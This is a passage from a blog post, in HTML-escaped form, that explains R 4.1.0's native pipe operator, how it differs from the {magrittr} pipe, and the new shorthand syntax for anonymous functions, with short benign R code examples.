which contributed packages (CRAN, Bioconductor) evolve.&lt;/p&gt;
&lt;p&gt;Imagine introducing a new feature into the R language. Even if problems
arise with the usability of that feature, it would need to be maintained
until at least the next major release, by which time thousands of
developers and analysts may depend upon it. Unsurprisingly, the R
maintainers are exceedingly cautious when introducing new syntax.&lt;/p&gt;
&lt;p&gt;Similarly, you should employ caution when using new syntax in your own
code. If you do use syntax that was introduced in R-4.1, be aware that
your code will &lt;em&gt;not&lt;/em&gt; run on versions of R that precede this. For
example, this may prevent your new analysis scripts from running on your
colleague’s computer, or prevent users from installing your new package.&lt;/p&gt;
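&lt;p&gt;If you do rely on the new syntax, it can help to fail early with a clear
message. The following is a minimal sketch, not a prescribed approach: the
variable name &lt;code&gt;has_native_pipe&lt;/code&gt; and the wording of the error are
our own choices for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Guard clause for a project that uses R 4.1 syntax elsewhere.
# Keep this check in a file that itself avoids the new syntax, because
# older versions of R cannot even parse it.
has_native_pipe = getRversion() &amp;gt;= &amp;#34;4.1.0&amp;#34;
if (!has_native_pipe) {
  stop(
    &amp;#34;This analysis needs R 4.1.0 or later; found R &amp;#34;,
    as.character(getRversion())
  )
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For a package, the equivalent is to declare the requirement in the
&lt;code&gt;DESCRIPTION&lt;/code&gt; file with &lt;code&gt;Depends: R (&amp;gt;= 4.1.0)&lt;/code&gt;, so
that installation is refused on older versions of R.&lt;/p&gt;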
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-new-features-r410-pipe-anonymous-functions"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-native-pipe"&gt;The native pipe&lt;/h2&gt;
&lt;p&gt;When the {magrittr} package introduced the pipe to R in 2014, it was
building upon similar syntax in Unix / Linux scripting languages (bash)
and functional programming languages (like F#), and aimed to&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“decrease development time and improve the readability and
maintainability of code”
&lt;a href="https://cran.r-project.org/web/packages/magrittr/vignettes/magrittr.html" rel="external"&gt;Bache, 2014&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To illustrate the value of pipeline-syntax, here is some code that
involves nested function calls:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make a density plot of a sampled distribution:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You might rewrite it in separate steps, to better distinguish the order
in which the functions are called (&lt;code&gt;rnorm()&lt;/code&gt;, and then &lt;code&gt;density()&lt;/code&gt; and
then &lt;code&gt;plot()&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make a density plot of a sampled distribution&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;raw_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;density_summary &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;(raw_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(density_summary)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But, unless you plan to reuse the samples (&lt;code&gt;raw_data&lt;/code&gt;) or their summary
(&lt;code&gt;density_summary&lt;/code&gt;), code like this may introduce many unnecessary
variables into your R environment. The {magrittr} pipe provides a nice
middle ground, that limits the use of unnecessary variables and
maintains the natural sequence of function-calls in the written code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;magrittr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.1.0 introduces a pipe operator &lt;code&gt;|&amp;gt;&lt;/code&gt; into the base R syntax:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, sd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;density&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The new operator is nicer to type and should be both more efficient and
easier to debug than the {magrittr} pipe.&lt;/p&gt;
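&lt;p&gt;Part of the reason is that the native pipe is handled by the parser as a
syntax transformation rather than as a function call, so no pipe function
appears in the call stack. As a minimal sketch, assuming R 4.1.0 or later,
you can see this by inspecting the unevaluated expression with
&lt;code&gt;quote()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# R 4.1.0 or later: the parser rewrites the pipe before evaluation
quote(letters |&amp;gt; head())
# head(letters)

# The piped and nested forms are the same expression
identical(quote(letters |&amp;gt; head()), quote(head(letters)))
# [1] TRUE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;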
&lt;h3 id="the-native-pipe-vs-magrittr"&gt;The native pipe vs {magrittr}&lt;/h3&gt;
&lt;p&gt;Note that &lt;code&gt;|&amp;gt;&lt;/code&gt; is not a drop-in replacement for all uses of &lt;code&gt;%&amp;gt;%&lt;/code&gt;. The
{magrittr} pipe allowed function-calls to be written with or without
parentheses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# With parentheses:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Without parentheses:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; head
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the native pipe the parentheses &lt;em&gt;must&lt;/em&gt; be present:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0: Make sure your parentheses are present:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;c&amp;#34; &amp;#34;d&amp;#34; &amp;#34;e&amp;#34; &amp;#34;f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {magrittr} pipe allowed the caller to use the “piped-in” values
anywhere in the function call. The piped-in value is represented using a
dot (&lt;code&gt;.&lt;/code&gt;) as a placeholder. For example, you could use those values as
the second argument:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Is the string &amp;#34;at&amp;#34; found in any of the animals?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, .)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;No placeholder is provided with the native pipe. To achieve the same
result using the native pipe, you would need to define a function. This
can be done explicitly with a predefined function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;find_at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;find_at&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;… or implicitly using an in-place function definition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0: make sure you remember the parentheses on the RHS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)}()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="shorthand-syntax-for-anonymous-functions"&gt;Shorthand syntax for anonymous functions&lt;/h2&gt;
&lt;p&gt;Functions are typically defined in R using the syntax&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;do_something &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(parameters) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function that results can be used as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;do_something&lt;/span&gt;(args)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Functions may also be defined anonymously, and this is common practice
when using higher-order functions such as those in the {purrr} package
(&lt;code&gt;map()&lt;/code&gt;, &lt;code&gt;reduce()&lt;/code&gt;, &lt;code&gt;keep()&lt;/code&gt;; and their base-R counterparts: &lt;code&gt;Map()&lt;/code&gt;,
&lt;code&gt;lapply()&lt;/code&gt; etc).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# For each letter,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - find the name of each dataset in the {datasets} package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# that starts with that letter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Using {tidyverse} syntax&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ds &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ds[stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_starts&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tolower&lt;/span&gt;(ds), x)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[1]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;ability.cov&amp;#34; &amp;#34;airmiles&amp;#34; &amp;#34;AirPassengers&amp;#34; &amp;#34;airquality&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[5] &amp;#34;anscombe&amp;#34; &amp;#34;attenu&amp;#34; &amp;#34;attitude&amp;#34; &amp;#34;austres&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[2]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;beaver1&amp;#34; &amp;#34;beaver2&amp;#34; &amp;#34;BJsales&amp;#34; &amp;#34;BJsales.lead&amp;#34; &amp;#34;BOD&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[3]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;cars&amp;#34; &amp;#34;ChickWeight&amp;#34; &amp;#34;chickwts&amp;#34; &amp;#34;co2&amp;#34; &amp;#34;CO2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[6] &amp;#34;crimtab&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In base R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^&amp;#34;&lt;/span&gt;, x) &lt;span style="color:#8b949e;font-style:italic"&gt;# eg &amp;#34;^a&amp;#34; to match a leading &amp;#39;a&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;), value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, ignore.case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this setting the &lt;code&gt;function(x) {...}&lt;/code&gt; syntax can look rather verbose,
especially when chaining together several functions into a pipeline. A
new syntax has been introduced into R that may make these anonymous
function declarations more succinct:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) {
